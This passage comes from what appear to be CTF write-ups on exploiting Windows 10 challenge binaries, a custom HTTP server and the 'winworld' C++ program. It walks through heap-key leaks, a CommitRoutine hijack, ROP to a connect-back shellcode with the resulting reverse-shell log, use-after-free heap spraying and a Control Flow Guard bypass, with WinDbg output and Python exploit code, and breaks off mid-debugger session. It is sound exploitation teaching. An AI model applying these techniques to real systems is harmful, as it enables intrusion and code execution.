The CommitRoutine field immediately caught my eye as it sounds like something you can trigger with a large allocation (such as with our Content-Length). The documentation mentions the following:

Callback routine to commit pages from the heap. If this parameter is non-NULL, the heap must be nongrowable. If HeapBase is NULL, CommitRoutine must also be NULL.

However our private heaps are growable since they are created with HeapCreate(0, 0, 0), whose documentation says:

If dwMaximumSize is 0, the heap can grow in size. The heap’s size is limited only by the available memory.

Anyway, if we change its value manually in the debugger and trigger a large allocation, it turns out that the callback is indeed called!

0:004> dt nt!_HEAP 1ee`a0a60000 CommitRoutine
   +0x168 CommitRoutine : 0x685d9804`f365ca2b     long  +685d9804f365ca2b
0:004> eq 1ee`a0a60000+168 4142434445464748
0:004> g
(25ac.3eac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ff8`92a73030 ffe0            jmp     rax {291fdb40`b6238d63}
0:003> r
rax=291fdb40b6238d63 rbx=000001eea0a60000 rcx=000001eea0a60000
rdx=000000363e8ff980 rsi=000001eea0a64fc0 rdi=000001eea0a64fd0
rip=00007ff892a73030 rsp=000000363e8ff918 rbp=000001eea0a60000
 r8=000000363e8ffa28  r9=0000000000003010 r10=00007ff892af09a0
r11=8080808080808080 r12=0000000000000000 r13=000000000000007f
r14=000000363e8ffa28 r15=000001eea0a602e8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206

As we can see several registers have values in the heap, with rbx, rcx and rbp pointing to the beginning of the heap. Using this along with our (constrained) arbitrary-write, we should be able to pivot to a ROP/JOP chain.

A quick look inside RtlpFindAndCommitPages (from the stack trace) shows an xor rax, cs:RtlpHeapKey before the call to the CFG dispatch function (Control Flow Guard isn’t enabled here).

0:003> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 00000036`3e8ff918 00007ff8`929e8773 : 000001ee`a0a60000 00000000`00000000 00000000`00000020 00007ff8`929e01fe : ntdll!guard_dispatch_icall_nop
01 00000036`3e8ff920 00007ff8`929e8433 : 000001ee`a0a65000 000001ee`a0a60000 00000036`3e8ff9d0 00000000`00000010 : ntdll!RtlpFindAndCommitPages+0x87
02 00000036`3e8ff980 00007ff8`929e07b4 : 00000000`00000040 00000000`00000002 00000000`0000007f 00000000`00004000 : ntdll!RtlpExtendHeap+0x33
03 00000036`3e8ffa10 00007ff8`929dda21 : 000001ee`a0a60000 00000000`00000002 00000000`00003001 00000000`00003010 : ntdll!RtlpAllocateHeap+0xf54
04 00000036`3e8ffc80 00007ff6`58072732 : 00000000`00000000 00000000`00000000 000001ee`a0a60a4f 00007ff6`58070000 : ntdll!RtlpAllocateHeapInternal+0x991
05 00000036`3e8ffd70 00007ff8`8fdb7e94 : 00000000`000000b8 00000000`00000000 00000000`00000000 00000000`00000000 : winhttpd!handle_client+0x292
06 00000036`3e8ffe00 00007ff8`92a3a251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
07 00000036`3e8ffe30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:003> dq ntdll!RtlpHeapKey L1
00007ff8`92b36808  685d9804`f365ca2b

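The mangled CommitRoutine we read earlier is equal to RtlpHeapKey, so its initial (unmangled) value was NULL. This means we can leak the heap XOR key either from the CommitRoutine field of any heap or directly from NTDLL.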
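
The mangling can be checked against the debugger session above with a few lines of Python. The function names are made up; the only operation assumed is the 64-bit XOR with RtlpHeapKey seen in RtlpFindAndCommitPages.

```python
MASK64 = (1 << 64) - 1


def mangle(pointer: int, heap_key: int) -> int:
    """Value stored in _HEAP.CommitRoutine for a given callback pointer."""
    return (pointer ^ heap_key) & MASK64


def demangle(stored: int, heap_key: int) -> int:
    """XOR is its own inverse, so demangling is the same operation."""
    return mangle(stored, heap_key)


# Values from the second WinDbg session (heap at 1ee`a0a60000).
heap_key = 0x685D9804F365CA2B
stored_before = 0x685D9804F365CA2B  # CommitRoutine before the 'eq'
stored_after = 0x4142434445464748   # value written with 'eq'

print(hex(demangle(stored_before, heap_key)))  # original callback
print(hex(demangle(stored_after, heap_key)))   # where 'jmp rax' ended up
```

The second value is exactly the rax shown in the crash, which confirms that writing target ^ RtlpHeapKey into the field is enough to choose the jump target.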

Finding the address of any heap

This is all great but we can’t trigger a large allocation from any of the previous threads anymore, so we’ll have to create a new one, wait before sending it the HTTP headers, and leak its address in the meantime.

Fortunately NTDLL also keeps a list of our heaps:

0:006> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
+      17c`cd460000      17c`cd465000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
       17c`cd465000      17c`cd46f000        0`0000a000 MEM_PRIVATE MEM_RESERVE                                    Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
+     7ff8`929d0000     7ff8`929d1000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`929d1000     7ff8`92ae8000        0`00117000 MEM_IMAGE   MEM_COMMIT  PAGE_EXECUTE_READ                  Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92ae8000     7ff8`92b2f000        0`00047000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b2f000     7ff8`92b30000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b30000     7ff8`92b32000        0`00002000 MEM_IMAGE   MEM_COMMIT  PAGE_WRITECOPY                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b32000     7ff8`92b3a000        0`00008000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b3a000     7ff8`92bbd000        0`00083000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
0:006> .for (r $t0 = 7ff8`92b2f000; @$t0 < 7ff8`92b3a000; r $t0 = @$t0 + 8) { .if (poi(@$t0) >= 17c`cd460000 & poi(@$t0) < 17c`cd465000) { dps $t0 L1 } }
00007ff8`92b33bb0  0000017c`cd460000
0:006> dq 0x7ff892b33b80
00007ff8`92b33b80  0000017c`cd2c0000 0000017c`cd0b0000
00007ff8`92b33b90  0000017c`cd220000 0000017c`cd4e0000
00007ff8`92b33ba0  0000017c`cd260000 0000017c`cd6d0000
00007ff8`92b33bb0  0000017c`cd460000 0000017c`cd590000
00007ff8`92b33bc0  00000000`00000000 00000000`00000000
00007ff8`92b33bd0  00000000`00000000 00000000`00000000

We can launch a new thread and use the arbitrary read from above to leak the address of its heap.
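
Walking that list could be sketched as follows. The fake memory is the dq dump above; `read_qword` stands in for the arbitrary read and is idealized, since the real primitive returns a NUL-terminated string and a heap address aligned on 0x10000 starts with two NUL bytes, so in practice the bytes have to be read past them. The “known before” snapshot is a hypothetical illustration of how a freshly created heap could be singled out.

```python
HEAP_LIST = 0x7FF892B33B80  # address of the list inside ntdll, from the dump

heaps_in_dump = [
    0x17CCD2C0000, 0x17CCD0B0000, 0x17CCD220000, 0x17CCD4E0000,
    0x17CCD260000, 0x17CCD6D0000, 0x17CCD460000, 0x17CCD590000,
]
memory = {HEAP_LIST + 8 * i: heap for i, heap in enumerate(heaps_in_dump)}


def read_qword(addr: int) -> int:
    """Idealized arbitrary read backed by the dump (unmapped slots read as 0)."""
    return memory.get(addr, 0)


def read_heap_list(read, list_addr: int, max_entries: int = 64) -> list:
    """Collect heap handles until the first empty slot."""
    heaps = []
    for i in range(max_entries):
        value = read(list_addr + 8 * i)
        if value == 0:
            break
        heaps.append(value)
    return heaps


heaps = read_heap_list(read_qword, HEAP_LIST)
known_before = set(heaps[:6])  # hypothetical snapshot taken before new threads
new_heaps = [h for h in heaps if h not in known_before]
target_slot = HEAP_LIST + 8 * heaps.index(0x17CCD460000)

print([hex(h) for h in new_heaps], hex(target_slot))
```

The slot computed for the target heap is the same address the exploit log reports for it.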

Stack pivot, ROP, shellcode

We control RIP and rbp points to the heap, so we can look for a “leave ; pop ; ret” pivot gadget. This one does the trick:

# leave ; ⇨ mov rsp, rbp ; pop rbp
# mov rbx, qword [rsp+0x18]
# mov rax, rcx
# mov rbp, qword [rsp+0x20]
# mov rsi, qword [rsp+0x28]
# mov rdi, qword [rsp+0x30]
# pop r15
# pop r14
# ret
pivot_gadget = ntdll_base + 0x010442e

The above gadget pivots to the beginning of the heap (rbp) and pops 3 values off the pivoted stack, therefore we must control heap+0x18, which is SegmentListEntry, a heap entry without NULL bytes in its LSBs – so we can edit it.
So, we overwrite:

  • heap+0x168 (CommitRoutine) with pivot_gadget ^ RtlpHeapKey
  • heap+0x18 (SegmentListEntry) with a large “add rsp, 0xXXX” gadget:
    • 0x0d26c4: add rsp, 0x0000000000000CD0 # pop rbx # ret
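
The two overwrites and the resulting stack pointer can be worked out in a few lines of Python. The gadget offsets are the ones given above and the base, key and target heap values come from the exploit log; the step-by-step rsp trace is my own arithmetic on those gadgets, not output from the exploit.

```python
NTDLL_BASE = 0x7FF8929D0000
RTLP_HEAP_KEY = 0xF603AD6B90E97029
TARGET_HEAP = 0x17CCD460000

PIVOT_GADGET = NTDLL_BASE + 0x10442E    # leave ; ... ; pop r15 ; pop r14 ; ret
ADD_RSP_GADGET = NTDLL_BASE + 0x0D26C4  # add rsp, 0xCD0 ; pop rbx ; ret

# What the arbitrary write has to store, keyed by destination address.
writes = {
    TARGET_HEAP + 0x168: PIVOT_GADGET ^ RTLP_HEAP_KEY,  # mangled CommitRoutine
    TARGET_HEAP + 0x18: ADD_RSP_GADGET,                 # SegmentListEntry.Flink
}

# Follow rsp through both gadgets; rbp == heap base when the callback fires.
rsp = TARGET_HEAP   # leave: mov rsp, rbp
rsp += 8            # leave: pop rbp
rsp += 8            # pop r15
rsp += 8            # pop r14
first_ret_slot = rsp
rsp += 8            # ret consumes the qword at heap+0x18
rsp += 0xCD0        # add rsp, 0xCD0
rsp += 8            # pop rbx
rop_start = rsp     # the next ret reads its target from here

print(hex(first_ret_slot - TARGET_HEAP), hex(rop_start - TARGET_HEAP))
```

With these gadgets the first controlled return address after the big jump sits at heap+0xcf8. Assuming the target heap is laid out like the two traced above, that offset falls inside the 0x2000-byte req_head buffer allocated at heap+0x860, which is presumably where the retsled and chain end up.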

Now we can store a retsled followed by a ROP chain. Since I didn’t bother to leak any other libs from NTDLL, I decided to ROP directly to ntdll!NtProtectVirtualMemory, the syscall used behind the scenes by VirtualProtect, which lets us change the heap page permissions to RWX.

At this point we just need to store a connect-back shellcode after the ROP and jump into it to finally get our shell and read the flag!

$ ./ 42003
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19224
[+] Opening connection to on port 42003: Done
[*] heap leak: 0x17ccd223160
[+] heap of thread 1 @ 0x17ccd220000
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19225
[+] Opening connection to on port 42003: Done
[*]   'username' in heap 1 @ 0x17ccd222c80
[*]   ntdll pointer @ 0x17ccd2202c0
[*]   'password' in heap 1 @ 0x17ccd222ca0
[*]   CommitRoutine in heap 1 @ 0x17ccd220168
[+] ntdll!RtlpStaticDebugInfo leak: 0x7ff892b33d10
[+] NTDLL @ 0x7ff8929d0000
[+] ntdll!RtlpHeapKey = 0xf603ad6b90e97029
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19226
[+] Opening connection to on port 42003: Done
[+] Opening connection to on port 42003: Done
[*]   thread 4 addr stored in ntdll @ 0x7ff892b33bb0
check threads list
[+] target_heap @ 0x17ccd460000
[+] Trying to bind to on port 12345: Done
[+] Waiting for connections on Got connection from on port 19227
[+] Opening connection to on port 42003: Done
[+] Spawning shell...

And get the connect-back (here from the CTF server):

$ nc -lvp 1337
listening on [any] 1337 ...
connect to [] from [] 49729
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\winhttpd\inetpub>cd ..
 Volume in drive C has no label.
 Volume Serial Number is F845-3464

 Directory of C:\winhttpd

01/19/2019 01:07 AM <DIR> .
01/19/2019 01:07 AM <DIR> ..
01/19/2019 12:52 AM <DIR> inetpub
01/19/2019 01:06 AM 26,112 winhttpd.exe
01/18/2019 11:01 PM <DIR> wow_gg_the_flag_is_in_here
              1 File(s) 26,112 bytes
              4 Dir(s) 40,418,689,024 bytes free

C:\winhttpd>cd wow_gg_the_flag_is_in_here
C:\winhttpd\wow_gg_the_flag_is_in_here>type flag.txt
INS{HEADs I WIN, tails you lose}

In summary we used 5 requests/threads which we all kept alive throughout the exploit:

  • 1st one leaked the address of the first private heap
  • 2nd leaked NTDLL + the RtlpHeapKey value
  • 3rd leaks the address of the target heap
  • 4th has the target heap, we keep it waiting for a while then trigger a large allocation to get RIP
  • 5th uses the arbitrary write to overwrite the mangled CommitRoutine pointer with a stack pivot


Of course none of this is really specific to “private” heaps. You can find the same ntdll!RtlpStaticDebugInfo pointer and CommitRoutine callback in the main heap as well 🙂

Unfortunately no team was able to solve the challenge during the CTF, although it appears that several teams were pretty close!
You can find my exploit here and the sources here. It can fail sometimes because of things like occasional NULL bytes in the leaked values, but should work most of the time.

Exploiting a misused C++ shared pointer on Windows 10

In this post I describe a detailed solution to my “winworld” challenge from Insomni’hack CTF Teaser 2017. winworld was an x64 Windows binary coded in C++11 with most of Windows 10’s built-in protections enabled, notably AppContainer (through the awesome AppJailLauncher), Control Flow Guard and the recent mitigation policies.

These can quickly be verified using Process Hacker (note also the reserved 2TB of CFGBitmap!):

The task was running on Windows Server 2016, which as far as the challenge is concerned behaves exactly as Windows 10 and even uses the exact same libraries. The challenge and description (now with the source code) can be found here.

Logic of the binary:

Our theme this year was “rise of the machines”; winworld is about the recent Westworld TV show, and implements a “narrator” interface where you can create robots and humans, configure their behavior, and move them on a map where they interact with each other.

The narrator manipulates Person objects, which is a shared class for both “hosts” (robots) and “guests” (humans). Each type is stored in a separate list.

Each Person object has the following attributes:

The narrator exposes the following commands:

--[ Welcome to Winworld, park no 1209 ]--
narrator [day 1]$ help
Available commands:
 - new <type> <sex> <name>
 - clone <id> <new_name>
 - list <hosts|guests>
 - info <id>
 - update <id> <attribute> <value>
 - friend <add|remove> <id 1> <id 2>
 - sentence <add|remove> <id> <sentence>
 - map
 - move <id> {<l|r|u|d>+}
 - random_move
 - next_day
 - help
 - prompt <show|hide>
 - quit
narrator [day 1]$

The action happens during calls to move or random_move whenever 2 persons meet. The onEncounter method pointer is called and they interact. Only attack actually has impact on the other Person object: if the attack is successful the other takes damage and possibly dies. Robots can die an infinite number of times but cannot kill humans. Humans only live once and can kill other humans. The next_day feature restores the lives of robots and the health of everyone, but if the object is a dead human, it gets removed from its list.

People talk in an automated way using a Markov Chain that is initialized with the full Westworld script and the added sentences, which may result in fun conversations. Many sentences still don’t quite make sense though, and since the vulnerabilities aren’t in there, I specified it in the description to spare some reversing time (there is already plenty of C++ to reverse…).

Vulnerability 1: uninitialized attribute in the Person copy constructor

During the Narrator initialization, the map is randomly generated and a specific point is chosen as the “maze center”, a special point that, when reached under certain conditions, turns a robot into a human. These conditions are that the currently moved Person must be a HOST, have is_conscious set, and there must be a human (GUEST) on the maze center too.

The first thing is thus to find that point. All randomized data is obtained with rand(), and the seed is initialized with a classic srand(time(NULL)). Therefore the seed can be determined easily by trying a few seconds before and after the local machine time. Once synchronized with the server’s clock, simply replaying the map initialization algorithm in the exploit recovers the rand() values used to generate the maze center. Coding a simple pathfinding algorithm then allows us to walk any person to this position.
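
The seed search can be sketched like this. It is only an illustration, assuming the binary uses the classic Microsoft CRT rand() generator (multiplier 214013, increment 2531011, 15-bit output). The `observed` list stands in for whatever the exploit can compare against, for example values recovered from the generated map; how the challenge turns rand() outputs into the map is not reproduced here, and the names below are hypothetical.

```python
class MsvcRand:
    """Re-implementation of the classic Microsoft CRT rand() generator."""

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def rand(self):
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF

def find_seed(observed, around, window=60):
    """Try every seed within +/- window seconds of `around` until the outputs match."""
    for delta in range(-window, window + 1):
        prng = MsvcRand(around + delta)
        if [prng.rand() for _ in observed] == list(observed):
            return around + delta
    return None

# Demo with a made-up "server" clock that is 21 seconds behind the local one.
local_time = 1484990021
server = MsvcRand(local_time - 21)
observed = [server.rand() for _ in range(4)]
recovered = find_seed(observed, around=local_time)
print(recovered - local_time)
```

Once the seed is known, a fresh `MsvcRand(recovered)` can replay exactly the same sequence the server consumed during map initialization.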

Robots are initialized with is_conscious = false in the Person::Person constructor. However the Person::Person *copy* constructor used in the narrator’s clone function forgets to do this initialization! The value will thus be uninitialized and use whatever was already on the heap. It turns out that just cloning a robot is often enough to get is_conscious != 0… but let’s make sure it always is.

Sometimes the newly cloned robot will end up on the Low Fragmentation Heap, sometimes not. The best approach is then to make sure it always ends up on the LFH by cloning 0x10 - (number of current Person objects) = 6 times. Let’s clone a person 6+1 times and check in windbg:

0:004> ? winworld!Person::Person
Matched: 00007ff7`9b9ee700 winworld!Person::Person (<no parameter info>)
Matched: 00007ff7`9b9ee880 winworld!Person::Person (<no parameter info>)
Ambiguous symbol error at 'winworld!Person::Person'
0:004> bp 00007ff7`9b9ee880 "r rcx ; g" ; bp winworld!Person::printInfos ; g
Breakpoint 1 hit
00007ff7`9b9f0890 4c8bdc mov r11,rsp
0:000> r rcx
0:000> !heap -x 0000024a826800c0
Entry User Heap Segment Size PrevSize Unused Flags
0000024a826800b0 0000024a826800c0 0000024a82610000 0000024a82610000 a0 120 10 busy 

0:000> !heap -x 0000024a82673d70
Entry User Heap Segment Size PrevSize Unused Flags
0000024a82673d60 0000024a82673d70 0000024a82610000 0000024a828dec10 a0 - 10 LFH;busy

Here we see that the first 2 clones aren’t on the LFH, while the remaining ones are.

The LFH allocations are randomized, which could add some challenge. However these allocations are randomized using an array of size 0x100 with a position that is incremented modulo 0x100, meaning that if we spray 0x100 elements of the right size, we will come back to the same position and thus get a deterministic behavior. We don’t even need to keep the chunks in memory, so we can simply spray using a command string of size 0x90 (same as Person), which will always initialize the is_conscious attribute for the upcoming clone operation.
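
The wrap-around argument can be illustrated with a toy model. This is not the real allocator: it only assumes, as described above, a table of 0x100 random values walked with an index that is incremented modulo 0x100. The class and its fields are hypothetical names.

```python
import random

TABLE_SIZE = 0x100

class ToyLfhBucket:
    """Toy model only: a fixed table of random slot offsets walked with a wrapping index."""

    def __init__(self, seed=None):
        rng = random.Random(seed)
        self.table = [rng.randrange(TABLE_SIZE) for _ in range(TABLE_SIZE)]
        self.position = 0

    def next_slot(self):
        slot = self.table[self.position]
        self.position = (self.position + 1) % TABLE_SIZE
        return slot

bucket = ToyLfhBucket(seed=1209)
first = bucket.next_slot()          # random offset used by some allocation
for _ in range(TABLE_SIZE - 1):     # 0xff more allocations of the same size
    bucket.next_slot()
again = bucket.next_slot()          # the index has wrapped around
assert first == again
```

In this model, the allocation made right after a spray of 0x100 same-size objects reuses the random offset seen 0x100 allocations earlier, which is why the spray removes the randomness.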

So now our robot becomes human, and the troubles begin!

Note: It seems that by default Visual Studio 2015 enables the /sdl compilation flag, which will actually add a memset to fill the newly allocated Person object with zeros, and thus makes it unexploitable. I disabled it 😉 But to be fair, I enabled CFG which isn’t default!

Vulnerability 2: misused std::shared_ptr

A shared pointer is basically a wrapper around a pointer to an object. It notably adds a reference counter that gets incremented whenever the shared_ptr is associated to a new variable, and decremented when that variable goes out of scope. When the reference counter becomes 0, no more references to the object are supposed to exist anywhere in the program, so it automatically frees it. This is very useful against bugs like Use After Free.

It is however still possible to be dumb with these smart pointers… in this challenge, when a robot becomes human, it stays in the robots list (but its is_enabled field becomes false so it cannot be used as a robot anymore), and gets inserted into the humans list with the following code:

This is very wrong because instead of incrementing the reference counter of the object’s shared_ptr, we create a new shared_ptr that points to the same object:

When the reference counter of any of the two shared_ptr gets decremented to 0, the object gets freed and since the other shared_ptr is still active, we will get a Use After Free! To do so, we can kill the human-robot using another human. We also have to remove all his friends otherwise the reference counter will not reach 0. Then using the next_day function will free it when it removes the pointer from the guests vector:

So now getting RIP should be easy since the object holds a method pointer: spray 0x100 strings of length 0x90 with a fake object – a std::string can also contain null bytes – and then move the dead human-robot left-right so he meets his killer again, and triggers the overwritten onEncounter method pointer:

import struct

def craft_person(func_ptr, leak_addr, size):
    payload = struct.pack("<Q", func_ptr)  # onEncounter method pointer
    payload += b"\x00" * 24  # friends std::vector
    payload += b"\x00" * 24  # sentences std::vector

    # std::string name
    payload += struct.pack("<Q", leak_addr)
    payload += b"JUNKJUNK"
    payload += struct.pack("<Q", size)  # size
    payload += struct.pack("<Q", size)  # max_size

    payload += struct.pack("<I", 1)  # type = GUEST
    payload += struct.pack("<I", 1)  # sex
    payload += b"\x01"  # is_alive
    payload += b"\x01"  # is_conscious
    payload += b"\x01"  # is_enabled
    return payload

# sendline() and the socket s come from the rest of the exploit
payload = craft_person(func_ptr=0x4242424242424242, leak_addr=0, size=0)
for i in range(0x100):
    sendline(s, payload)
sendline(s, "move h7 lr")


0:004> g
(1a00.c68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007ffa`89b164ae 488b14c2 mov rdx,qword ptr [rdx+rax*8] ds:010986ff`08d30908=????????????????
0:000> ? rax << 9
Evaluate expression: 4774451407313060352 = 42424242`42424200
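
The `rax << 9` computation above reflects how the CFG check indexes its bitmap: the faulting instruction reads the 64-bit bitmap entry at index (target >> 9). A minimal sketch of that indexing follows; the bit position within the entry is my understanding of the check for 16-byte aligned targets and should be read as an assumption rather than something shown in this trace.

```python
def cfg_bitmap_lookup(target):
    """Return (qword_index, bit_index) used to look up `target` in the CFG bitmap.

    Each 64-bit bitmap entry covers 0x200 bytes of address space.
    The bit index is an assumption valid for 16-byte aligned targets.
    """
    qword_index = target >> 9
    bit_index = (target >> 3) & 0x3F
    return qword_index, bit_index

target = 0x4242424242424242
qword_index, bit_index = cfg_bitmap_lookup(target)
# Shifting the index back gives the value windbg printed for "rax << 9".
assert qword_index << 9 == 0x4242424242424200
print(hex(qword_index), bit_index)
```

With a bogus target such as 0x4242424242424242 the bitmap entry itself is unmapped, hence the access violation inside the check instead of at the call.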

Control Flow Guard is going to complicate things a bit, but before that we still need to leak one address to defeat ASLR.

Leaking the binary base address

In the previous code sample we crafted a name std::string of size 0 to prevent the binary from crashing when printing the name. Replacing the pointer and size with valid values will print size bytes at that address, therefore we got our arbitrary read primitive. Now what do we print? There is ASLR everywhere except for the _KUSER_SHARED_DATA at 0x7ffe0000, which doesn’t hold any pointer anymore on Windows 10…

Instead of exploiting our UAF with a string we must therefore replace the freed Person object with another object of the same LFH size (0xa0). We don’t have any, but we can check if we could increase the size of one of our vectors instead.

Iteratively trying with our std::vector<std::shared_ptr<Person>> friends, we get lucky with 7 to 9 friends:

0:004> g
Breakpoint 0 hit
00007ff7`9b9f0890 4c8bdc mov r11,rsp
0:000> dq rcx
000001cf`94daea60 00007ff7`9b9ef700 000001cf`94d949b0
000001cf`94daea70 000001cf`94d94a20 000001cf`94d94a40
000001cf`94daea80 000001cf`94dac6c0 000001cf`94dac760
000001cf`94daea90 000001cf`94dac780 00736572`6f6c6f44
000001cf`94daeaa0 61742074`73657567 00000000`00000007
000001cf`94daeab0 00000000`0000000f 00000002`00000000
000001cf`94daeac0 00000000`20010001 00000000`00000000
000001cf`94daead0 0000003d`00000020 0000000a`00000004
0:000> !heap -x 000001cf`94d949b0
Entry User Heap Segment Size PrevSize Unused Flags
000001cf94d949a0 000001cf94d949b0 000001cf94d30000 000001cf94dafb50 a0 - 10 LFH;busy 

0:000> dq 000001cf`94d949b0
000001cf`94d949b0 000001cf`94dfb410 000001cf`94d90ce0
000001cf`94d949c0 000001cf`94dac580 000001cf`94d90800
000001cf`94d949d0 000001cf`94d98f90 000001cf`94d911c0
000001cf`94d949e0 000001cf`94d99030 000001cf`94d912e0 # string pointer
000001cf`94d949f0 000001cf`94db4cf0 000001cf`94d91180 # string size
000001cf`94d94a00 000001cf`94db7e60 000001cf`94d912a0
000001cf`94d94a10 000001cf`94e97c70 000001cf`94d91300
000001cf`94d94a20 7320756f`590a2e73 73696874`20776f68
0:000> dps poi(000001cf`94d949b0+8+0n24*2) L3
000001cf`94d912e0 00007ff7`9b9f7158 winworld!std::_Ref_count<Person>::`vftable'
000001cf`94d912e8 00000001`00000005
000001cf`94d912f0 000001cf`94d99030

The vector now belongs to the same LFH bucket as Person objects. If we spray 0xf0 strings followed by 0x10 7-friends vectors we will be able to leak pointers: to a vtable inside winworld and to the heap. We should be able to actually do that with 0xff strings then 1 friends vector, but there appear to be some allocations happening in between sometimes, and I haven’t debugged what caused them.

We don’t control the size though, which is huge, so the binary will inevitably crash! Good thing is that on Windows libraries are randomized only once per boot, as opposed to the heap, stack etc. that are randomized for each process. This is dirty, but since this binary is restarted automatically it isn’t a problem, so we have leaked the binary base and we can reuse it in subsequent connections.

Protip: when you develop a Windows exploit, don’t put the binary on the share to your Linux host: this has the nice side effect of forcing randomization of the binary base at each execution! Call it a mitigation if you want 🙂

Bypassing Control Flow Guard

Control Flow Guard (CFG) is Microsoft’s Control Flow Integrity (CFI) measure, which is based on the simple idea that any indirect call must point to the beginning of a function. A call to __guard_check_icall_fptr is inserted before indirect calls:

On Windows 10 this calls ntdll!LdrpValidateUserCallTarget to check that the pointer is a valid function start using its CFGBitmap of allowed addresses, and aborts if not.

The advantage of CFG is that it can hardly break a legit program (so, no reason not to use it!). However 3 generic weaknesses are apparent in CFG:

  1. The set of allowed targets is still huge, compared to a CFI mechanism that verifies the type of function arguments and return values
  2. It cannot possibly protect the stack, since return addresses are not function starts. Microsoft will attempt to fix this with Return Flow Guard and future Intel processor support, but this is not enforced yet.
  3. If a loaded module isn’t compiled with CFG support, all the addresses within that module are set as allowed targets in the CFGBitmap. Problems may also arise with JIT. (here the binary and all DLLs support CFG and there is no JIT)

While I was writing this challenge an awesome blog post was published about bypassing CFG, that abuses kernel32!RtlCaptureContext (weakness 1). It turns out that j00ru – only person that solved this task, gg! – used it to leak the stack, but I haven’t, and opted for leaking/writing to the stack manually (weakness 2).

We have abused the std::string name attribute for arbitrary read already, now we can also use it to achieve arbitrary write! The only requirement is to replace the string with no more bytes than the max size of the currently crafted std::string object, which is therefore no problem at all. This is cool, however so far we don’t even know where the stack (or even heap) is, and it is randomized on each run of the program as opposed to the libraries. We will come back to this later on. First we also want to leak the addresses of the other libraries that we may want to use in our exploit.

Leaking other libraries

Using the binary base leak and a spray of 0x100 crafted persons strings we have enough to leak arbitrary memory addresses. We can leave the vectors to null bytes to prevent them from crashing during the call to Person::printInfos.

Now that we have the binary base address and that it will stay the same until next reboot, leaking the other libraries is trivial: we can just dump entries in the IAT. My exploit makes use of ucrtbase.dll and ntdll.dll (always in the IAT in the presence of CFG), which can be leaked by crafting a std::string that points to the following addresses:

0:000> dps winworld+162e8 L1
00007ff7`9b9f62e8 00007ffa`86d42360 ucrtbase!strtol
0:000> dps winworld+164c0 L2
00007ff7`9b9f64c0 00007ffa`89b164a0 ntdll!LdrpValidateUserCallTarget
00007ff7`9b9f64c8 00007ffa`89b164f0 ntdll!LdrpDispatchUserCallTarget
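
Turning such an IAT leak into a library base is a subtraction. The sketch below does it for ntdll, using offsets derived from the windbg output in this write-up (the leaked LdrpValidateUserCallTarget pointer and the `ntdll+96470` gadget shown later). They are specific to this ntdll build, and the helper names are hypothetical.

```python
import struct

# Offsets derived from this write-up's windbg output; valid for this ntdll build only.
LDRP_VALIDATE_USER_CALL_TARGET_OFFSET = 0x964A0
POP_RDX_RCX_R8_R9_RET_OFFSET = 0x96470

def parse_iat_entry(raw):
    """Decode the first 8 leaked bytes as a little-endian pointer."""
    return struct.unpack("<Q", raw[:8])[0]

def ntdll_base_from_iat(leaked_ptr):
    """Subtract the function's offset inside ntdll from the leaked IAT entry."""
    return leaked_ptr - LDRP_VALIDATE_USER_CALL_TARGET_OFFSET

# Bytes as they would come back from printing the crafted name string.
raw_leak = struct.pack("<Q", 0x7FFA89B164A0)
ntdll_base = ntdll_base_from_iat(parse_iat_entry(raw_leak))
gadget = ntdll_base + POP_RDX_RCX_R8_R9_RET_OFFSET
print(hex(ntdll_base), hex(gadget))
```

A quick sanity check in a real exploit is that the computed base is 64 KiB aligned; if it is not, the leak was probably truncated by a null byte or the offset is wrong.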

To repeat the leak we can overwrite the onEncounter method pointer with the address of gets(), once we have located the base address of ucrtbase.dll. This is of course because of the special context of the task that has its standard input/output streams redirected to the client socket. This will trigger a nice gets(this_object) heap overflow that we can use to overwrite the name string attribute in a loop.

Leaking the stack

Where can we find stack pointers? We can find the PEB pointer from ntdll, however in x64 the PEB structure doesn’t hold any pointer to the TEBs (that contains stack pointers) anymore…

A recent blogpost from j00ru described an interesting fact: while there is no good reason to store stack pointers on the heap, there may be some leftover stack data that was inadvertently copied to the heap during process initialization.

His post describes it on x86, let’s check if we still have stack pointers lurking on the heap in x64:

0:001> !address
        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
        3b`b6cfb000       3b`b6d00000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_READWRITE                     Stack      [~0; 2524.1738]
0:001> !heap
 Heap Address NT/Segment Heap

